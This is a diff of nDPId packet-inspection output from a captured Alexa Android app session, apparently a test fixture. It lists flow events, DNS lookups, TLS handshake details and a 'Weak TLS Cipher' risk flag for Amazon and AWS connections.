+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) 
Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1490976090796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1490976090796,"pkt":"AMDKkaPvePiC0\/vCCABFAABJWlpAAEARM1CsECrYrBAqAYuOADUANbcep0QBAAABAAAAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQAB"} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1490976090982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1490976090982,"pkt":"ePiC0\/vCAMDKkaPvCABFAAB13VlAAEARsCSsECoBrBAq2AA1i44AYd1op0SBgAABAAIAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQABwAwABQABAAAADgAQDXMzLWV4dGVybmFsLTHAGsA5AAEAAQAAAAQABDbnSFg="} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} 
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} 
-00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 